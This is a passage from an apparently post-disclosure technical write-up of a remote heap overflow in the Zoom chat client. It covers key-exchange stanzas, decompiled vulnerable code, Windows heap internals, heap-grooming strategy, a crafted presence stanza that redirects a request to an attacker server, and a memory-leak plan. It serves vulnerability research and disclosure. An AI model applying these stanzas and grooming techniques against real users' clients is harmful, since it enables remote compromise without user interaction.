  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="SendMessage">
      <msg>
        <message>/fWuV6UYSwamNEc40VKAnA==</message>
        <iv>sriMTH04EXSPnphTKWuLuQ==</iv>
      </msg>
      <xkey>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  </zmtask>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
  </zmext>
</message>
  2. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <thread>gloox{25F7E533-7434-49E3-B3AC-2F702579C347}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <zmext>
    <msg_type>207</msg_type>
    <from n="Jane Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</scid>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="RequestKey">
      <xkey>
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTA0MDIxMjAzNDVaFw0yMjA0MDIxMjMzNDVaMEoxLDAqBgNVBAMMI2VrM19mZHZ5dHFnbTB6emxtY25kZ2FAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAa5LZ0vdjfjTDbPnuK2Pj1WKRaBee0QoAUQ281Z+uG4Ui58+QBSfWVVWCrG/8R4KTPvhS7/utzNIe+5R8oE69EPFAFNBMe/nCugYfi/EzEtwzor/x1R6sE10rIBGwFwKNSnzxtwDbiFmjpWFFV7TAdT/wr/f1E1ZkVR4ooitgVwGfREVMA0GCSqGSIb3DQEBCwUAA4IBAQAbtx2A+A956elf/eGtF53iQv2PT9I/4SNMIcX5Oe/sJrH1czcTfpMIACpfbc9Iu6n/WNCJK/tmvOmdnFDk2ekDt9jeVmDhwJj2pG+cOdY/0A+5s2E5sFTlBjDmrTB85U4xw8ahiH9FQTvj0J4FJCAPsqn0v6D87auA8K6w13BisZfDH2pQfuviJSfJUOnIPAY5+/uulaUlee2HQ1CZAhFzbBjF9R2LY7oVmfLgn/qbxJ6eFAauhkjn1PMlXEuVHAap1YRD8Y/xZRkyDFGoc9qZQEVj6HygMRklY9xUnaYWgrb9ZlCUaRefLVT3/6J21g6G6eDRtWvE1nMfmyOvTtjC</pub_cert>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <v2data action="None"/>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
</message>
  3. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <thread>gloox{24A77779-3F77-414B-8BC7-E162C1F3BDDF}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <recv>[email protected]</recv>
      <rres>ZoomChat_pc</rres>
      <rcid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</rcid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTAyMTgxOTIzMjJaFw0yMjAyMTgxOTUzMjJaMEoxLDAqBgNVBAMMI2V3Y2psbmlfcndjamF5Z210cHZuZXdAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAPyPYr49WDKcwh2dc1V1GMv5whVyLaC0G/CzsvJXtSoSRouPaRBloBBlay2JpbYiZIrEBek3ONSzRd2Co1WouqXpASo2ADI/+qz3OJiOy/e4ccNzGtCDZTJHWuNVCjlV3abKX8smSDZyXc6eGP72p/xE96h80TLWpqoZHl1Ov+JiSVN/MA0GCSqGSIb3DQEBCwUAA4IBAQCUu+e8Bp9Qg/L2Kd/+AzYkmWeLw60QNVOw27rBLytiH6Ff/OmhZwwLoUbj0j3JATk/FiBpqyN6rMzL/TllWf+6oWT0ZqgdtDkYvjHWI6snTDdN60qHl77dle0Ah+VYS3VehqtqnEhy3oLiP3pGgFUcxloM85BhNGd0YMJkro+mkjvrmRGDu0cAovKrSXtqdXoQdZN1JdvSXfS2Otw/C2x+5oRB5/03aDS8Dw+A5zhCdFZlH4WKzmuWorHoHVMS1AVtfZoF0zHfxp8jpt5igdw/rFZzDxtPnivBqTKgCMSaWE5HJn9JhupHisoJUipGD8mvkxsWqYUUEI2GDauGw893</pub_cert>
        <encoded>...</encoded>
        <signature>MIGHAkIBaq/VH7MvCMnMcY+Eh6W4CN7NozmcXrRSkJJymvec+E5yWqF340QDNY1AjYJ3oc34ljLoxy7JeVjop2s9k1ZPR7cCQWnXQAViihYJyboXmPYTi0jRmmpBn61OkzD6PlAqAq1fyc8e6+e1bPsu9lwF4GkgI40NrPG/kbUx4RbiTp+Ckyo0</signature>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
</message>

There are two options for how the key is encrypted, depending on the type of key used by the recipient’s certificate. If it uses an RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but an elliptic curve key using the curve P-521. Algorithms for direct encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, an elliptic curve Diffie-Hellman exchange using both users’ keys is performed to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.
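
For illustration, this is roughly what such a hybrid scheme looks like, sketched with Python’s cryptography package. Note that the key-derivation step here is our assumption: the analysis only tells us the shared secret is split into a key and an IV, not how Zoom derives them (we use HKDF as a stand-in).

from cryptography.hazmat.primitives import hashes, padding
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

# Each side holds a P-521 key pair (taken from their X509 certificates).
sender_priv = ec.generate_private_key(ec.SECP521R1())
recipient_priv = ec.generate_private_key(ec.SECP521R1())

# ECDH: both sides can derive the same shared secret.
shared = sender_priv.exchange(ec.ECDH(), recipient_priv.public_key())

# Split derived material into an AES-256 key and a CBC IV (HKDF is our stand-in KDF).
material = HKDF(algorithm=hashes.SHA256(), length=48, salt=None, info=b"demo").derive(shared)
key, iv = material[:32], material[32:]

# Encrypt the message key with AES-CBC; this would be the <encoded> payload.
padder = padding.PKCS7(128).padder()
data = padder.update(b"the message key") + padder.finalize()
enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
encoded = enc.update(data) + enc.finalize()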

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;
  }

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    
    if (iVar5 < 2) {
      logging::LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      log_message(uVar3);
      logging::LogMessage::~LogMessage(local_d0);

      return 1;
    }

    return 1;
  }

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;
  }

  local_20 = iVar2;
  EVP_CIPHER_CTX_reset(iVar2);
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
      log_message(uVar3);
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
        logging::LogMessage::LogMessage
                  (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
        log_message(uVar3);
      }
      goto LAB_101ba758;
    }

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      EVP_CIPHER_CTX_free(iVar2);
      return 0;
    }

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_180,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
      log_message(uVar3);
    }

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  
  logging::LogMessage::~LogMessage(this);
LAB_101ba852:
  EVP_CIPHER_CTX_free(local_20);
  return 0xc;
}

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client, but having a legitimate client initiate it requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted an external contact request or is currently in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then, while handling the same packet, used for the overflow. We cannot place the buffer first, allocate something else, and then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few of these objects during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT heap is what is used here. The NT heap has two different allocators (for allocations of less than about 16 kB): the front-end allocator (known as the Low-Fragmentation Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.
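
As a mental model, here is a toy freelist in Python showing the behavior described above: first fit on a size-sorted list, splitting of the remainder, and the last-in-first-out property for same-size alloc/free. This is purely illustrative, not the real NT heap (coalescing of neighbors, among other things, is omitted).

import bisect

class Freelist:
    def __init__(self, blocks):               # blocks: list of (size, address)
        self.blocks = sorted(blocks)

    def alloc(self, size):
        for i, (bsize, addr) in enumerate(self.blocks):
            if bsize >= size:                  # first block that is big enough
                self.blocks.pop(i)
                if bsize > size:               # split: remainder goes back on the list
                    bisect.insort(self.blocks, (bsize - size, addr + size))
                return addr
        raise MemoryError("no fit: extend the heap with a new page")

    def free(self, addr, size):                # coalescing omitted for brevity
        bisect.insort(self.blocks, (size, addr))

h = Freelist([(512, 0x1000), (2048, 0x4000)])
a = h.alloc(1040)          # carved out of the 2048-byte block at 0x4000
h.free(a, 1040)
print(hex(h.alloc(1040)))  # 0x4000 again: same-size alloc/free is last-in-first-out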

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter whether the LFH or the back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.
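
A toy version of that header encoding (the header layout here is simplified; only the XOR idea matters):

import os

key = os.urandom(4)                              # per-heap random encoding key

def encode_header(header: bytes) -> bytes:
    # XOR the first four bytes with the heap key; the other four stay as-is.
    return bytes(a ^ b for a, b in zip(header[:4], key)) + header[4:]

hdr = bytes([0x82, 0x00, 0x00, 0x00]) + b"\x00\x00\x00\x00"  # e.g. a size field first
enc = encode_header(hdr)
assert encode_header(enc) == hdr   # XORing twice restores the original
# An overflow that blindly rewrites enc will decode to garbage under the key,
# so corrupted metadata is very likely to be detected.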

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLLs, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to perform the following procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrarily sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because the client was waiting for a response. It could be of an arbitrarily large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a block of a specific size, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done with WinDbg, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size, making sure it would no longer affect the freelist, by having the client perform at least 17 allocations of that size.
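
To give an idea of what such scripts look like, here is a minimal sketch using Frida’s Python bindings that logs heap allocations and frees. The process name, and hooking RtlAllocateHeap/RtlFreeHeap specifically, are our assumptions; the actual scripts also reconstructed freelist state.

import frida

js = """
const alloc = Module.getExportByName('ntdll.dll', 'RtlAllocateHeap');
const free_ = Module.getExportByName('ntdll.dll', 'RtlFreeHeap');
Interceptor.attach(alloc, {
    onEnter(args) { this.size = args[2].toInt32(); },  // RtlAllocateHeap(heap, flags, size)
    onLeave(retval) { send({op: 'alloc', size: this.size, addr: retval.toString()}); }
});
Interceptor.attach(free_, {
    onEnter(args) { send({op: 'free', addr: args[2].toString()}); }  // (heap, flags, addr)
});
"""

session = frida.attach("Zoom.exe")
script = session.create_script(js)
script.on("message", lambda msg, data: print(msg["payload"]))
script.load()
input("Tracing allocations; press enter to stop...")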

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it became more and more likely that at least one of them would already be handled by the LFH, completely breaking our exploit. We weren’t very keen on participating with an exploit that had already failed 75% of the time by the time the application had finished launching. We spent a few weeks trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, let’s look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLLs are loaded at random locations and the locations of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLLs and for the heap.
  • DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the two OpenSSL DLLs did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.

Not enabling CFG for a DLL means two things:

  • Any dynamic function call by this library does not check whether the address is a function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another library which does use CFG and which calls an address in these DLLs is always allowed. The list of valid function start locations is not present for these DLLs, which means that all addresses in the range of those DLLs are allowed.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLLs to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then free all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks to see whether there are other not-yet-full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality available in the application. A common way would be to allocate something which has a length field, overflow that length field and then read the object back. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 bytes containing a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.

We had found a way to initiate HTTPS requests to a server we control. The method was to send a weird combination of two stanzas Zoom would normally use: one for sending an invitation to add a user, and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>
</presence>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

While a client only expects this stanza from the server, it is possible to send it from a different user account; it is then handled as long as the sender is not yet in the user’s contact list. Combining these two stanzas, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:

"https://marketplacecontent.zoom.us" + image
"https://marketplacecontent.zoom.us" + "example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
"https://marketplacecontent.zoom.usexample.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.

We are still not fully sure why this worked, but it did. This is one of two additional low-impact bugs we used for our attack; according to the Zoom Security Bulletin, it has also been fixed. On its own, this bug could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over it than over the XMPP connection. The XMPP connection is not direct but goes through the server, which meant that invalid XML would never reach us. As the addresses we wanted to leak were unlikely to consist entirely of printable characters, we could not get them included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

  1. Initiate a HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake (see the sketch after this list).
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.
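
As a minimal sketch of the server side of this plan (in Python, with hypothetical certificate paths and an illustrative fixed delay; the real server coordinated with the code triggering the overflow), step 2 comes down to accepting the TCP connection but not answering the ClientHello until the overflow has happened:

import socket, ssl, time

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("cert.pem", "key.pem")     # hypothetical certificate for our domain

srv = socket.create_server(("0.0.0.0", 443))
conn, addr = srv.accept()                      # step 2: accept the TCP connection...
time.sleep(30)                                 # ...but stall the handshake while the overflow runs (step 3)
tls = ctx.wrap_socket(conn, server_side=True)  # step 4: now let the handshake proceed
request = tls.recv(8192)                       # step 5: bytes after the 1087-byte query are leaked heap data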

This video illustrates how this works:

In essence, this is similar to creating an object, overwriting a length field and reading it back. Instead of overwriting a length counter, we overwrite the zero-terminator of a string by writing over the entire contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL (specifically, in libcrypto-1_1.dll). TLS1_PRF_PKEY_CTX is an object used during a TLS handshake to verify a MAC of the handshake transcript, to make sure an active attacker has not changed anything in transit. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
